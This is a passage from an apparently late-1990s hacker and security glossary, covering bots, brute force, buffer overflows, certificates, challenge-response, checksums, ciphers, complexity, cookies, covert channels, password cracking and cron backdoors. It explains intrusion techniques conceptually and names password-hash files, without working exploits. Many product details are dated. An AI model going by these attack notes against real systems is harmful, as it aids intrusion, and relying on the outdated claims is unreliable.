Example: A cancel-bot is a program that attempts to cancel lots of messages within USENET newsgroups. These are sometimes used by the USENET Death Penalty or rogue cancelers.

Example: Search engine spiders that index the web follow web-page links, going from site to site, downloading web-pages.

Example: In the IRC wars, hackers run automated bots to control channels. These are programs (usually in C) that help in administering channels, protecting against hackers, flooding, and so forth.

browser [1]

Key point: Netscape and Microsoft have not yet produced a browser that is hardened against predation from hostile websites.

Key point: Disabling Java, JavaScript, and ActiveX will lock out virtually all hacks against the browser. However, this will also lock out many websites.

brute force [3]

A classic attack technique whereby all possible combinations are attempted until one succeeds. This typically refers to cryptography, either finding the right key to decrypt a message, or discovering somebody's password.

Analogy: If you somehow steal somebody's ATM card, you could try to use it in a bank machine. PIN numbers are only 4 digits, meaning 10,000 possible combinations. If you were patient, you could stand at the cash machine trying all possible 10,000 combinations. (Of course, ATM machines will always eat the cards after a few unsuccessful tries in order to stop this).

Key point: The term brute force often means "the most difficult way". In the above example of the PIN number, you can always find the PIN number after guessing 10,000 combinations. But sometimes there are easier ways. For example, a bank may choose to assign PIN numbers based upon a combination of the issuing date and the user's name. Therefore, the problem is reduced to guessing when a card was issued, which may consist of only a few hundred guesses.

Therefore, any technique that is more difficult than brute force is pointless. Likewise, brute force is very difficult, so hackers continually search for techniques that are less difficult.

Key point: The possibility of doing brute-force key-space searches is often compared to the age of the universe, the number of atoms in the planet Earth, and the yearly output of the sun. For example, Bruce Schneier has calculated that, according to what we know of quantum mechanics today, the entire energy output of the sun is insufficient to break a 197-bit key.

buffer overflow (buffer overrun)[2]

A classic exploit that sends more data than a programmer expects to receive. Buffer overflows are one of the most common programming errors, and the ones most likely to slip through quality assurance testing.

Analogy: Consider two popular bathroom sink designs. One design is a simple sink with a single drain. The other design includes a backup drain near the top of the sink. The first design is easy and often looks better, but suffers from the problem that if the drain is plugged and the water is left running, the sink will overflow all over the bathroom. The second design prevents the sink from overflowing, as the water level can never get past the top drain.

Example: In much the same way, programmers often forget to validate input. They (rightly) believe that a legal username is less than 32 characters long, and (wrongly) reserve more than enough memory for it, typically 200 characters. They assume that nobody will enter a name longer than 200 characters, and don't verify this. Malicious hackers exploit this condition by purposely entering user names 1000 characters long.

Key point: This is a classic programming bug that afflicts almost all systems. The average system on the Internet is vulnerable to a well known buffer overflow attack. Many Windows NT servers have IIS services vulnerable to a buffer overflow in ".htr" handler, many Solaris servers have vulnerable RPC services like cmsd, ToolTalk, and statd; many Linux boxes have vulnerable IMAP4, POP3, or FTP services.

Key point: Programs written in C are most vulnerable, C++ is somewhat less vulnerable. Programs written in scripting level languages like VisualBasic and Java are generally not vulnerable. The reason is that C requires the programmer to check buffer lengths, but scripting languages generally make these checks whether the programmer wants them or not.

Key point: Buffer overflows are usually a Denial-of-Service in that they will crash/hang a service/system. The most interesting ones, however, can cause the system to execute code provided by the hacker as part of the exploit.

Defenses: There are a number of ways to avoid buffer-overflows in code:

Use programming languages like Java that bounds-check arrays for you.
Run code through special compilers that bounds-check for you.
Audit code manually
Audit code automatically
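As a rough illustration of the first defense, the sketch below uses Python, a language that bounds-checks for you. The 200-character buffer comes from the example above; the function names store_username and unchecked_write are hypothetical and exist only for this sketch.

```python
MAX_NAME = 200  # size of the buffer reserved for a username, as in the example above


def store_username(name: bytes) -> bytearray:
    """Copy a username into a fixed-size buffer, rejecting oversized input."""
    if len(name) > MAX_NAME:
        # This is the check the careless programmer forgot to write.
        raise ValueError(f"username too long: {len(name)} > {MAX_NAME} bytes")
    buffer = bytearray(MAX_NAME)
    buffer[:len(name)] = name
    return buffer


def unchecked_write(buffer: bytearray, index: int, value: int) -> None:
    """No explicit check here, but the language still refuses to write out of bounds."""
    buffer[index] = value


try:
    store_username(b"A" * 1000)
except ValueError as err:
    print("rejected by the programmer's check:", err)

try:
    unchecked_write(bytearray(MAX_NAME), 1000, 0x41)
except IndexError as err:
    print("rejected by the language itself:", err)
```

In C, the equivalent of unchecked_write would silently write past the end of the buffer, which is exactly the condition an exploit relies on.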

Key point: The NOOP (no operation) machine language instruction for x86 CPUs is 0x90. Buffer overflows often have long strings of these characters when attacking x86 computers (Windows, Linux).

Key point: In a successful buffer overflow exploit, the hacker forces the system to run his own code. Since most network services run as "root" or "administrator", the exploit would give complete control over the machine. For this reason, more and more services are being configured to run with lower privileges.

- C -

C programming language [3]

Key point: The language is quirky, difficult for beginners to learn, and really just an accident of history. Despite this, one must grok the language in order to become a true hacker.

Key point: The large number of buffer overflow exploits is directly related to the poor way that C protects programmers from doing the wrong thing. On the other hand, this lack of protection leads directly to its high speed.

cache [3]

In general computer science, the word cache means simply to keep things around in case they are used again. For example, when you log onto your system, your username and password are stored in a cache in memory, because they are repeatedly used by the system every time you access a resource.

Key point: Sometimes systems can be exploited through the cache. Examples are:

HTTP proxy servers: Companies use these so that thousands of users can share a single Internet connection. They store recently used webpages so that when multiple users access the same web-site, the proxy server only has to go across the link once in order to fetch the page for all the users. A never ending series of bugs leads to conditions whereby when one user logs into a website, other users can see that first user's data.
Web-browser history/file cache: Once a hacker breaks into a machine, he/she can view the history cache (list of URLs) or file cache (the actual contents of the web-sites) in order to spy on where the user has been. Embarrassing, inadvertent disclosure of this information by users with certain surfing habits is common.
Web-browser cookie cache: Lots of web-sites store passwords within cookies, so that stealing somebody's cookie information will allow a hacker to log in as that user.

camping [2]

A hacking technique whereby the intruder monitors a range of ISP dialup lines. As soon as a user dials up, the hacker is notified and automated attack scripts are run. For example, the intruder's program may ping the range continuously, and as soon as a ping responds, a script is run that attempts to connect to File and Print Sharing and read files from the hard disk.

Key point: When dialing up to an ISP, the first 10 minutes are the most dangerous.

certificate [3]

In PKI, a certificate contains the public key of the owner, and is signed by a trusted CA.

Key point: Certificates can be revoked. This means that a company who believes that their site has been compromised can put up a server on the Internet that tells everyone else that the certificate is no longer valid.

Key point: The Verisign embedded certificates in older browsers (IE 3.0, Netscape 4.0) have expiration dates of January 1, 2000. This means that anybody using older browsers will get nasty warnings when they visit ecommerce sites or attempt to verify files with authenticode.

Certificate Authority (CA) [3]

A trusted authority who signs certificates.

Key point: The way it is supposed to work is that if you have a certificate that claims to be Microsoft signed by Verisign (a popular CA), then you trust that Verisign has done a reasonable job ensuring that Microsoft is who they say they are, and that Microsoft has done a reasonably good job protecting their private keys from theft.

Contrast: Microsoft could create a "self-signed" certificate, but then anybody else could create a self-signed certificate claiming to be Microsoft. Therefore, you trust a CA-signed certificate more than a self-signed certificate, as long as you trust the CA.

Key point: How do you trust a CA? The answer is marketing. First, a company like Verisign has spent millions of dollars creating a reputable company that would be destroyed if a flaw was found in their process (i.e. thieves were able to steal their private keys). Second, Verisign (and a few other CAs) have managed to embed their public keys within Internet Explorer and Netscape Navigator. This means that any website using SSL must obtain a certificate signed by one of these built-in CAs, or else users get confusing warning messages.

Humor: Microsoft uses certificates signed by Verisign, because it is trusted by many people. The reason so many people trust Verisign these days is because its root keys are included with Microsoft's browsers.

Key point: One of the chief RISKS is the theft of the private key used to sign things. If a hacker/thief is able to steal it, then they can masquerade as someone

Key point: Several important CA certificates (i.e. Verisign) expired on Dec. 31, 1999. Since it is feasible to eventually compromise a certificate, certificates usually expire at some date. The certificates for trusting root CAs that are built into many browsers (Internet Explorer 4.0 and earlier, Netscape Navigator 4.06 and earlier) were created in 1995, and were made for a 5-year lifespan. One of the creators of these certificates now says he wishes he'd put the expiration date a little off, such as on Dec. 15, in order to avoid the Y2K madness.

cgi-bin (CGI, Common Gateway Interface)[3]

On webservers, CGI is a standard for creating dynamic content. When you request a document in the /cgi-bin directory, instead of sending you the document, the webserver passes your request to the named program/script. This program generates the requested document on the fly, usually based upon the contents of a backend database. The word "CGI" stands for "Common Gateway Interface", which generally confuses people more than it helps them.

chaining [4]

For block-ciphers, chaining is the technique of combining the information from previous blocks into the encryption of the next block, such that the same pattern in a message will not be encrypted the same way twice.

challenge [3]

A method to authenticate users that avoids sending passwords over the network. It goes something like this (though the details among various programs are different).

the client requests access
the server sends back random data
the client then encrypts/hashes the data using the password
the server checks the result

In this manner, the client proves it knows the correct password without ever sending it across the wire.
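The four steps above can be sketched in a few lines. This is only one possible shape for such a protocol, not the method of any particular product: the use of HMAC-SHA256 as the "encrypts/hashes" step and the function names are assumptions made for this illustration.

```python
import hashlib
import hmac
import secrets


def make_challenge() -> bytes:
    """Server side: generate fresh random data for each login attempt."""
    return secrets.token_bytes(16)


def compute_response(password: str, challenge: bytes) -> bytes:
    """Client side: hash the challenge using the password as the key."""
    return hmac.new(password.encode("utf-8"), challenge, hashlib.sha256).digest()


def server_verify(stored_password: str, challenge: bytes, response: bytes) -> bool:
    """Server side: recompute the expected response and compare."""
    expected = compute_response(stored_password, challenge)
    return hmac.compare_digest(expected, response)


challenge = make_challenge()
response = compute_response("hunter2", challenge)    # the password never leaves the client
print(server_verify("hunter2", challenge, response))

# A sniffed response is useless against a fresh challenge (a replay attack).
print(server_verify("hunter2", make_challenge(), response))
```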

Key point: In most cases the user is prompted for the password, which the client then stores in memory. In the use of smart cards, however, the system may give the user the challenge string, which the user then types into the smart card. The smart card then produces a response, which the user must type back into the system. In this way, the user validates that they have the smart card.

Key point: Challenge-response systems are thought to be more secure because the challenge/response is different every time. This guards against replay attacks as well as making cracking more difficult.

chat [2]

Key point: Chat is a favorite of hackers because it provides real-time anonymous communication.

checksum [1]

A technique for detecting if data inadvertently changes during transmission. The sender simply divides all the data up into two-character (two-byte) numbers, then adds all the numbers together. The receiver makes the same calculation, and checks the calculated checksum against the transmitted checksum. If they don't match, then the receiver knows the data was corrupted in transit.

Key point: Checksums are not secure against intentional changes by hackers. For that, you need a cryptographic hash.
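A minimal sketch of such an additive checksum follows. It is a simplified illustration rather than the exact algorithm of any real protocol, and the messages are made up. It shows both halves of the story: accidental damage is caught, but an intentional rearrangement of the two-byte words goes unnoticed.

```python
def simple_checksum(data: bytes) -> int:
    """Add the data up as two-byte numbers, keeping only the low 16 bits."""
    if len(data) % 2:
        data += b"\x00"  # pad odd-length data with a zero byte
    total = 0
    for i in range(0, len(data), 2):
        total += int.from_bytes(data[i:i + 2], "big")
    return total & 0xFFFF


original = b"PAY BOB $100"
corrupted = b"PAY BOB $900"  # one character damaged in transit
tampered = b"BOB PAY $100"   # same two-byte words, deliberately reordered

print(simple_checksum(original) == simple_checksum(corrupted))  # damage is detected
print(simple_checksum(original) == simple_checksum(tampered))   # tampering is not
```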

cipher (decipher)[4]

In cryptography, the word cipher refers to an encryption algorithm. A cipher transforms the original data/message into pseudo-random data/message of the same length. In order to decipher the message, a reverse transformation must be applied.

Key point: A block cipher is one that encrypts a block of data at a time. For example, DES uses a block size of 64 bits. Each input block must correspond to exactly one output block (like a code-book). A block-cipher suffers from the fact that the same data repeated in a message would be encoded in the same way. Consider a block size of 8 bits encrypting English text; you could figure out all the letter 'e's in the ciphertext because 'e' is the most common letter used. Therefore, block-ciphers are often used in a chaining mode such that the same pattern will be encrypted differently each time it appears.

Key point: A stream cipher is essentially a chained block cipher with a block size of 1 (either 1-bit or 1-byte). It generates a keystream against which it XORs the plaintext, operating much like a one-time pad, though less secure in theory but more secure in practice.

ciphertext [4]

In cryptography, ciphertext refers to the data after it has been encrypted.

Contrast: clear-text, plaintext.

clear-text [4]

In cryptography, the term clear-text refers to messages that have not been encrypted. The word has the connotation of data that should be encrypted, but isn't (such as clear-text passwords).

Misunderstanding: The word "text" comes from traditional cryptography that meant the text of messages, though these days "text" can refer to binary computer data as well.

cmos [3]

When the system is powered off, some persistent BIOS settings are stored in a small bit of battery-sustained RAM built using CMOS technology. The name "CMOS settings" has become synonymous with "BIOS settings". Some viruses have been known to corrupt these settings, resulting in a condition where the machine can no longer boot. Simply setting a jumper to disconnect the battery backup will restore the settings back to factory defaults.

code-book [4]

In ancient times, a code-book was a book where you looked up a word, and replaced it with another word according to the substitution table in the book. For example, you might look up the words "attack at dawn" in the book and come up with the words "mouse dog cat" that you send to your troops. The troops receiving the message would likewise look up these words in their code-books in order to figure out the original message.

Key point: In block-ciphers, the key represents a code-book. In other words, you could use the key to generate a huge book of matching pairs whereby each plaintext block would match to exactly one ciphertext block. Then, you could encrypt messages by looking them up in this table.

Key point: The term ECB or Electronic Code-Book refers to this mode of using a block-cipher. However, since it leaks information, many people prefer to chain blocks of ciphertext and plaintext together in order to make sure that the same pattern will be encrypted differently when it appears multiple times in a message.
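The difference between code-book mode and chaining can be seen with a toy cipher. The sketch below is deliberately insecure and purely illustrative: it assumes a block size of one byte, builds the "code-book" by shuffling a 256-entry table with the key, and all function names are made up for this example.

```python
import random


def make_code_book(key: int) -> list:
    """Use the key to generate a table mapping each 1-byte block to another."""
    table = list(range(256))
    random.Random(key).shuffle(table)
    return table


def encrypt_ecb(table: list, plaintext: bytes) -> bytes:
    """Code-book mode: every block is looked up independently."""
    return bytes(table[block] for block in plaintext)


def encrypt_chained(table: list, plaintext: bytes, iv: int) -> bytes:
    """Chaining: XOR each block with the previous ciphertext block first."""
    out = []
    previous = iv
    for block in plaintext:
        previous = table[block ^ previous]
        out.append(previous)
    return bytes(out)


def decrypt_chained(table: list, ciphertext: bytes, iv: int) -> bytes:
    """Reverse the lookup, then undo the XOR with the previous ciphertext block."""
    inverse = [0] * 256
    for plain, cipher in enumerate(table):
        inverse[cipher] = plain
    out = []
    previous = iv
    for block in ciphertext:
        out.append(inverse[block] ^ previous)
        previous = block
    return bytes(out)


table = make_code_book(key=1234)
message = b"eeee"
print(encrypt_ecb(table, message).hex())            # the same byte repeated four times
print(encrypt_chained(table, message, iv=7).hex())  # the repetition is normally hidden
```

In code-book mode, the repeated letter is visible to anyone looking at the ciphertext. With chaining, each output depends on everything that came before it, so repeated plaintext generally stops producing repeated ciphertext.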

compiler [1]

In programming, a compiler takes human readable source code and converts it into the binary code that the computer can understand.

Key point: A compiler is a form of lossy compression and one-way encryption. All the information meaningful to humans is removed from the code, leaving only the information necessary for the computer. This means that humans can no longer easily read the resulting program directly. Because of the "one-way" nature of the operation, programs cannot be used to recover the original source code. This effect is different in various languages. C++ is the worst language in terms of decompilation; Java is the best. Most Java applets can be decompiled back to some semblance of their previous form. This has led to a market for programs that further obfuscate Java binaries in an effort to hide the original source code. Some compilers do leave human-readable symbols behind for debugging purposes. They won't reveal the original source, but can still be useful for reverse engineering. They can be "stripped" from the binary.

complexity [3]

In computer science, complexity measures how difficult a problem is to solve. The problem is that while we may know of an algorithm that solves a problem, it will take a computer too long to solve it.

The best way to understand complexity is to consider the ancient parable (Babylonian?) about a king and a wise subject who did a favor for him. The subject asked for one piece of grain to be placed on the first square of a chess board, two grains on the second, four grains on the third, and so on, doubling the amount of grain for each successive square.

1 2 4 8 16 --- --- ---

--- --- --- --- --- --- --- ---

--- --- --- --- --- --- --- ---

--- --- --- --- --- --- --- ---

--- --- --- --- --- --- --- ---

--- --- --- --- --- --- --- ---

--- --- --- --- --- --- --- ---

--- --- --- --- --- --- --- ---

The question is: how much grain does this come out to? Your possible choices are:

a few handfuls
a few buckets
several wagons full of grain
all the grain produced by the kingdom in a year
more than the combined total ever harvested by mankind

The problem is known as having exponential complexity. The average computer scientist, when confronted with this problem, would intuitively guess the correct answer, which is that the amount of grain is more than a billion times a billion (2⁶⁴ - 1 grains in all), or more than all the grain ever harvested by mankind.

1 2 4 8 16 32 64 128
256 512 1024 2048 4096 8192 16384 32768
65536 131072 262144 524288 1048576 2097152 4194304 8388608
16777216 33554432 67108864 134217728 268435456 536870912 1073741824 2147483648
4294967296 8589934592 17179869184 34359738368 68719476736 137438953472 274877906944 549755813888
1099511627776 2199023255552 4398046511104 8796093022208 17592186044416 35184372088832 70368744177664 140737488355328
281474976710656 562949953421312 1125899906842624 2251799813685248 4503599627370496 9007199254740992 18014398509481984 36028797018963968
72057594037927936 144115188075855872 288230376151711744 576460752303423488 1152921504606846976 2305843009213693952 4611686018427387904 9223372036854775808
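The board can be recomputed in a couple of lines, which also gives the grand total. This is just a quick arithmetic check; the variable names are arbitrary.

```python
# One entry per square: 1 grain on the first, doubling on each square after that.
squares = [2 ** i for i in range(64)]
total = sum(squares)

print(squares[:5])           # the first five squares
print(squares[-1])           # the last square alone
print(total)                 # every square added together
print(total == 2 ** 64 - 1)  # the total is one less than the next doubling
```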

Example: Let's say that a dictionary was not sorted. This means that you would have to start at the beginning and look at every word until you found the definition you were looking for. This is an algorithm with linear complexity. The time it takes you to look up a word in such a dictionary is related to the number of words in the dictionary: if you double the size of such a dictionary, you will double the amount of time it takes to look up a word. In other words, the time to look up a word in this dictionary is on the order of the size of the dictionary. This is expressed as O(n), where n is the size of the dictionary.

Example: Dictionaries are sorted before printing. This means that you can quickly find the word you are looking for. In terms of complexity, we are more interested in how much longer it will take you to look up a word if we increase the size of the dictionary. For example, the Oxford English Dictionary (OED) is about 8 times larger than a more abridged English dictionary. However, it only takes about 3 more steps to look up a word in the OED, one for each doubling in size. As the problem size grows, the amount of effort it takes to solve the problem grows more slowly. If the OED were 16 times larger, then it would take only 4 more steps to search. If the OED were 32 times larger, it would take only 5 more steps to search. This mathematical relationship is known as a logarithm. The increase in computing power needed to solve such a problem grows on the order of the logarithm of the size of the problem. This is expressed as O(log n). Logarithmic problems are much easier to solve than linear ones, which is why we sort dictionaries.
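The two dictionary examples can be compared by counting how many words get examined. The sketch below is an illustration only: the "dictionaries" are made-up lists of zero-padded numbers, and the function names are hypothetical.

```python
def linear_lookups(words: list, target: str) -> int:
    """Unsorted dictionary: examine words one at a time from the beginning."""
    for count, word in enumerate(words, start=1):
        if word == target:
            return count
    return len(words)


def binary_lookups(sorted_words: list, target: str) -> int:
    """Sorted dictionary: open in the middle, then discard half each time."""
    low, high = 0, len(sorted_words) - 1
    count = 0
    while low <= high:
        count += 1
        mid = (low + high) // 2
        if sorted_words[mid] == target:
            return count
        if sorted_words[mid] < target:
            low = mid + 1
        else:
            high = mid - 1
    return count


small = [f"{i:05d}" for i in range(1000)]  # stand-in for an abridged dictionary
large = [f"{i:05d}" for i in range(8000)]  # a dictionary 8 times larger

for words in (small, large):
    last = words[-1]
    print(len(words), linear_lookups(words, last), binary_lookups(words, last))
```

Looking for the last word, the linear search examines every entry, so 8 times the words means 8 times the work. The sorted search goes from 10 probes to 13, only three more.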

Example: The chessboard problem mentioned above is similar to encryption keys. Every additional square on the chessboard doubles the size of the problem; every additional bit added to a key doubles the amount of time it would take to crack it. This means that a 32-bit key would take roughly four billion trials in order to crack, a 64-bit key would be roughly four billion times harder than that to crack, and a 128-bit key is more than a billion billion times harder to crack than a 64-bit key. This complexity is expressed as O(2ⁿ).

Key point: The following table shows the complexity of some algorithms.

big-O      complexity     problem = 8 elements    problem = 32 elements
O(log n)   logarithmic    3 seconds               5 seconds
O(n)       linear         8 seconds               32 seconds
O(n²)      quadratic      1 minute                17 minutes
O(n³)      cubic          9 minutes               9 hours
O(2ⁿ)      exponential    4 minutes               136 years

Note the deceptive nature of these numbers: for a problem size of 8, our exponential algorithm is actually faster than the cubic algorithm. But if you were to choose it in order to solve a problem of size 32, then it would not complete in your lifetime.
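The figures in the table can be reproduced with a short calculation. The sketch below assumes one step per second, which is an inference from the numbers themselves rather than something stated above; the dictionary and function names are made up.

```python
import math

# Number of steps each kind of algorithm needs for a problem of size n.
growth = {
    "O(log n)": lambda n: math.log2(n),
    "O(n)": lambda n: n,
    "O(n^2)": lambda n: n ** 2,
    "O(n^3)": lambda n: n ** 3,
    "O(2^n)": lambda n: 2 ** n,
}


def seconds_needed(name: str, n: int) -> float:
    """Time to finish at an assumed rate of one step per second."""
    return growth[name](n)


for name in growth:
    print(name, seconds_needed(name, 8), seconds_needed(name, 32))

# The exponential case at n = 32, converted from seconds to years.
seconds_per_year = 365.25 * 24 * 3600
print(seconds_needed("O(2^n)", 32) / seconds_per_year)
```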

compression [1]

Key point: Since encrypted data is essentially random data, you cannot compress it. This defeats networking standards designed to automatically compress traffic (such as modems). Therefore, data must be compressed before it is encrypted. For this reason, compression is becoming an automatic feature of most encryption products. The most often used compression standard is gzip and its compression library zlib.
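This is easy to observe with zlib itself. In the rough sketch below, random bytes from os.urandom stand in for encrypted data (an assumption made to keep the example free of any encryption library), and the sample text is made up.

```python
import os
import zlib

text = b"attack at dawn " * 300          # repetitive plaintext
random_like = os.urandom(len(text))      # stand-in for ciphertext of the same length


def ratio(data: bytes) -> float:
    """Compressed size divided by original size (smaller is better)."""
    return len(zlib.compress(data)) / len(data)


print(f"plaintext:   {ratio(text):.3f}")
print(f"random data: {ratio(random_like):.3f}")
```

The plaintext shrinks to a small fraction of its size, while the random data does not shrink at all, which is why compression has to happen before encryption.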

con [2]

Slang term for convention. Popular conventions are:

DEFCON: Held in the summer in Las Vegas.
HOPE: "Hackers On Planet Earth" put on by 2600 mag.

cookie [1]

Cookies are small bits of data that a website can place on your system, requesting your browser to send them back to the website the next time you visit. Cookies are a way of personalizing websites, and in general making the whole web experience better.

Misconception: Cookies by themselves are not a security/privacy risk. However, when combined with the HTTP Referer field and cross-site embedded images, they can be used to track users' activities. Users have sued sites like DoubleClick, which have massive numbers of cross-site embedded images, over the private information they collect. Cookies receive most of the blame for this.

Example: The biggest privacy hole is when cookies are combined with the HTTP Referer field. If many sites embed images (like advertisements) from a single site, that single site can use cookies in order to track a user going among those sites. The cookie does not identify who the user is, but can track what the user does. Other information, like web-site logons, can then be combined with this information in order to track who the person is.

Example: JavaScript has a long history of problems with cookies such that one website can retrieve the cookie information for another website. Since cookie information often contains username/password information, this can compromise the site.

Key point: Turning off cookies is not practical. The best you can hope for is "cookie management" -- choose which sites you want to allow cookies for but deny them to all the rest.

covert channel [4]

Key point: One rootkit uses ICMP as a covert channel. It creates a virtual TCP-like circuit inside of ping packets.

Key point: Covert channels can become extremely covert. In theory, one can create a covert channel where only the IP identification field (16-bits) carries the data.

Key point: URLs and DNS queries pass through virtually everything (including proxies). Therefore, it is easy to export information from inside a company to the outside using this technique.

crack [2]

To decrypt a password, or to bypass a copy protection scheme. See crackz for more about copy protection.

History: When the UNIX operating system was first developed, passwords were stored in the file /etc/passwd. This file was made readable by everyone, but the passwords were encrypted so that a user could not figure out what another person's password was. The passwords were encrypted in such a manner that you could test a password to see if it was valid, but you really couldn't decrypt the entry. (Note: not even administrators are able to figure out users' passwords; they can change them, but not decrypt them). However, a program called "crack" was developed that would simply test all the words in the dictionary against the passwords in /etc/passwd. This would find all user accounts whose passwords were chosen from the dictionary. Typical dictionaries also included people's names, since a common practice is to choose a spouse's or child's name.

Contrast: A "crack" program is one that takes existing encrypted passwords and attempts to find some that are "weak" and easily discovered. It is not a "password guessing" program that tries to log in with many passwords; that is known as a grind.

Key point: The sources of encrypted passwords typically include the following:

/etc/passwd from a UNIX system
SAM or SAM._ from a Windows NT system
<username>.pwl from a Windows 95/98 system
sniffed challenge hashes from the network

Key point: The "crack" program is a useful tool for system administrators. By running the program on their own systems, they can quickly find users who have chosen weak passwords. In other words, it is a policy enforcement tool.
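The kind of audit an administrator might run can be sketched as follows. This is a simplified illustration, not how the actual "crack" program works: salted SHA-256 stands in for the real password hashing, and the accounts, salts, word list, and function names are all made up.

```python
import hashlib


def hash_password(password: str, salt: str) -> str:
    """One-way hash: easy to test a guess against, impractical to reverse.

    SHA-256 is only a stand-in here for whatever the real system uses.
    """
    return hashlib.sha256((salt + password).encode("utf-8")).hexdigest()


def find_weak_passwords(entries: dict, dictionary: list) -> dict:
    """Test every dictionary word against every stored (salt, hash) pair."""
    weak = {}
    for user, (salt, stored_hash) in entries.items():
        for word in dictionary:
            if hash_password(word, salt) == stored_hash:
                weak[user] = word
                break
    return weak


# Hypothetical password file: one user picked a name, the other did not.
entries = {
    "alice": ("ab", hash_password("susan", "ab")),
    "bob": ("cd", hash_password("x9$Lq!27vT", "cd")),
}
dictionary = ["password", "susan", "dragon"]

print(find_weak_passwords(entries, dictionary))
```

Only the account whose password appears in the word list is reported, which tells the administrator which user needs to be asked to choose something stronger.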

Tools: On UNIX, the most commonly used program is called simply "crack". On Windows, a popular program is called "l0phtCrack" from http://www.l0pht.com.

cracker [1]

A specific type of hacker who decrypts passwords or breaks software copy protection schemes (creating "crackz").

Controversy: See the word hacker for a disagreement about the way that "cracker" is used in the computer enthusiast community vs. the security community.

CRC (Cyclic Redundancy Check)[2]

A form of a checksum that is able to detect accidental transmission errors. It is used on Ethernet in order to detect packet errors. It is also used on some operating systems in order to detect accidental errors in programs before running them.

Key point: Like a checksum, a CRC is not able to detect intentional changes.
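Python's zlib module exposes a 32-bit CRC, which makes the accidental-error case easy to try out. The sketch below is illustrative only; the frame contents and the function name crc_matches are made up.

```python
import zlib


def crc_matches(data: bytes, expected_crc: int) -> bool:
    """Receiver side: recompute the CRC and compare with the one that was sent."""
    return zlib.crc32(data) == expected_crc


frame = b"hello, ethernet"
sent_crc = zlib.crc32(frame)  # the sender appends this value to the frame

damaged = bytearray(frame)
damaged[0] ^= 0x01            # a single bit flipped by line noise

print(crc_matches(frame, sent_crc))           # the intact frame is accepted
print(crc_matches(bytes(damaged), sent_crc))  # the damaged frame is rejected
```

Nothing here involves a secret, so an attacker who changes the data can simply recompute the CRC and send that along instead.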

crackz [2]

Patches for programs that bypass copy protection schemes.

Culture: Cracking programs is its own little underground 'scene' independent of other hacking activities. Groups and individuals often compete to be the first to break a new copy protection scheme in popular programs. There are many sites that catalogue cracked programs.

credentials [4]

Your authentication information, such as a password, token, or certificate. Since not all systems require a password to log in, we use the more abstract term "credentials" to refer to this information.

cron [3]

On UNIX, the cron daemon automates background tasks (such as backups or rotating the logs). It is really the simplest of programs; it reads instructions from a file and executes the appropriate programs at the scheduled time.

Key point: When the machine is compromised, intruders will often put backdoor jobs into the crontab. When the victim tries to clean up his/her machine, the jobs in the crontab will run giving the intruder control again. This sort of thing happened in the famous attack against the New York Times; they kept cleaning up the machine, but cron kept giving control back to the intruder. Typically, these jobs would run during the wee hours of the morning when nobody is looking.

cryptanalysis [4]

In cryptography, cryptanalysis is the discipline of trying to break (or attack) encryption algorithms. The goal is to find some way of cracking a message that is easier than a brute force attack.

Key point: The different kinds of cryptanalysis are:

chosen plaintext: Where the attacker can construct plaintext in order to see how it is encrypted.
known plaintext: Where the attacker has copies of both the original plaintext as well as the encrypted text. Since most data is "structured" in some fashion (such as all e-mails have similar headers), it is likely that some plaintext will always be available for attack.
differential cryptanalysis: A chosen plaintext attack. When attacking an algorithm, the attacker attempts to feed different messages into the system looking for patterns in the output ciphertext.
linear cryptanalysis: A known plaintext attack. The attacker needs a large quantity of known plaintext (and corresponding ciphertext) in order to build up a statistical model.
algebraic: Looks for mathematical properties within the algorithm. For example, with some algorithms, a message encrypted twice with keys A and B can still be decrypted in one step with a key C. (Such an algorithm is known as a group).

cryptography [1]

History: So far, there are four major eras in cryptography.

Ancient times: Simple tricks were used among the Romans to encrypt and hide messages.
World War II: The dawn of "infowar" where code-breakers constituted an important part of the war effort, and machines were used on a wide scale to encrypt messages.
DES: The standardization of DES made encryption suddenly available to the masses. DES itself wasn't nearly as important as the spark it provided for research into cryptography, and the development of cryptography as a feature in products.
public-key encryption?: Before this point, cryptography concentrated on preventing your enemy from eavesdropping on your messages. This was done by sharing some secret ahead of time, then using that secret to decode the encrypted message. Public-key cryptography allows secure messages to be sent without any previously shared secret. This detail seems insignificant, but it has huge implications. For example, you can seamlessly create an encrypted connection to an e-commerce server and purchase products safe from eavesdropping because of public-key cryptography, but would not be able to with traditional cryptography. Thus, the huge economic distortions caused by e-commerce would probably not be possible without that one insignificant fact.

cryptographic [3]

Secured against hostile attack.

The best example is the "checksum" vs. "hash".

A checksum verifies that data hasn't been corrupted unintentionally. For example, all IP packets are checksummed in case they are corrupted accidentally between sender and receiver.

A cryptographic hash verifies that data hasn't been corrupted intentionally. Hackers can (and do) alter IP packets between the sender and receiver in order to carry out an attack, since IP's checksum is not cryptographically secure against hackers.

There are two features that are required in order to be cryptographic. The first is that the algorithm be secure against attack. A checksum uses simple addition, while hashes use a complex set of mathematical operations. The second is that the key must be of a sufficient size in order to prevent brute force attacks. The IP checksum is only two bytes long, so that even if the algorithm were secure, it would require only 65536 tries for the hacker to get it right, which can be done in real-time.
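
Example: A minimal Python sketch of the difference. The function name internet_checksum and the sample messages are made up for illustration; the function is a plain 16-bit ones'-complement sum in the style IP uses, and SHA-256 stands in for "some cryptographic hash" only as an assumption. Because addition doesn't care about order, swapping two 16-bit words changes the message without changing the checksum, while the hash changes completely.

```python
import hashlib

def internet_checksum(data: bytes) -> int:
    """16-bit ones'-complement sum of 16-bit words (illustrative implementation)."""
    if len(data) % 2:
        data += b"\x00"                      # pad odd-length input with a zero byte
    total = 0
    for i in range(0, len(data), 2):
        total += (data[i] << 8) | data[i + 1]
        total = (total & 0xFFFF) + (total >> 16)   # fold any carry back into the low 16 bits
    return ~total & 0xFFFF

# Hypothetical messages: the tampered one swaps the 16-bit words "10" and "00".
original = b"PAY 1000 TO BOB."
tampered = b"PAY 0010 TO BOB."

same_checksum = internet_checksum(original) == internet_checksum(tampered)
same_hash = hashlib.sha256(original).digest() == hashlib.sha256(tampered).digest()
print("checksum unchanged:", same_checksum)
print("hash unchanged:", same_hash)
```

The checksum catches random line noise well enough, but an attacker who rearranges or compensates for the changed words slips straight past it.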

culture [2]

TODO: (This section will contain pointers about the hacking underground. If you've got any ideas, please e-mail them to me: hacking-dict @ robertgraham.com).

Dress code

Anything black.

Fiction

Cyberpunk, Ender's Game by Orson Scott Card

Age

Teens

Music

Loud

movie

War Games (1983): This movie launched a generation of hackers in the early 1980s, creating hordes of war-dialers.
Hackers (1995): The "War Games" of the 1990s. While dumbed down to match the general public's tastes, the filmmakers did actually consult with the hacker underground.
The Net (1995): A story about a victim who uses her hacking skills to get back at the evil hackers who have taken over her life.

cyberpunk [2]

